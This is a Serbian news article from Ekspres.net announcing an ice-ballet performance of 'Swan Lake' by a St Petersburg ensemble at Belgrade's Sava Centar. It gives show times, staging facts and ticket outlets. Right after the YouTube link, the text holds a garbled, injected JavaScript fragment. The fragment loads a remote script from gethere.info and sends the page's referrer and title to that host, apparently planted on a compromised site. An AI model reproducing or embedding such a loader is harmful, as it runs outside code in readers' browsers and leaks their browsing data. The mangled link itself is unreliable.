Scena
13.12.2016. 07:32
ekspres

SPEKTAKL NA LEDU: ‘’Labudovo jezero’’ sutra u Sava centru!

Ekspres.net
Izvor: Ekspres.net

Beograd i Sava centar se uveliko pripremaju za najsofisticiraniji događaj ove zime Balet na ledu – ’’Labudovo jezero’’, u izvođenju državnog ansambla iz Sankt Peterburga. Naša publika će u sredu 14.decembra imati prilike da gleda ovaj spektakl u dva termina – od 18h i 21h.

Iskusnoj produkcijskoj ekipi, koja sve donosi iz Rusije, potrebna su 24 sata da montiraju poseban led, a samo 6 časova da isti demontiraju. Za ovu predstavu koristiće čak 2.700 kg leda! U kratkom filmu čiji vam link šaljemo u prilogu, moći ćete da vidite montiranje leda i fenomenalne scenografije za više od 40 vrhunskih plesača.

U starom ruskom maniru, sve mora da bude besprekorno, jer se među baletanima nalaze profesionalci sa titulom Majstora sporta Rusije koji zahtevaju i pružaju samo najbolje.

Čak i najiskusniji baletani i klizači tvrde da je gotovo nemoguće igrati balet na ledu, te je ansambl iz Sankt Peterburga jedan od retkih na svetu koji je uspeo u tome.

Za koreografiju je zadužen Konstantin Rasadin, koji u svojoj bogatoj biografiji ima i saradnju sa baletskim legendama kao što su Rudolf Nurejev i Mihail Barišnjikov.

Samo kostimi za ’’Labudovo jezero’’ vrede preko 250.000 dolara, jer pored estetike, moraju da poseduju i izuzetnu izdržljivost, da bi mogli da prate zahtevne figure koje izvode baletani ovog ansambla.

Ova predstava izvođena je na svim kontinentima, a sada, u potpuno novoj produkciji i koreografiji, konačno dolazi u naš glavni grad!

Ulaznice možete nabaviti na blagajni Sava Centra, u Win Win radnjama i putem www.ddtickets.rs

Pogledajte kako se montira klizalište za Balet na ledu:

https://www.youtube.com/watch?v=oqodYqRclmss.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Komentari
Dodaj komentar
Close
Vremenska prognoza
clear sky
29°C
09.08.2022.
Beograd

Najnovije

Vidi sve

Najčitanije

Vidi sve

Iz drugačijeg ugla

Vidi sve